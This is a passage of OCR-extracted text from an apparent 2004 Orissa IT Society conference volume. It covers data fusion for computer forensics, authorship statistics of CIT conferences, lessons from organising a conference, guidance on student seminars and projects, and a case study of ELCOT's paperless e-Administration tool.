different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

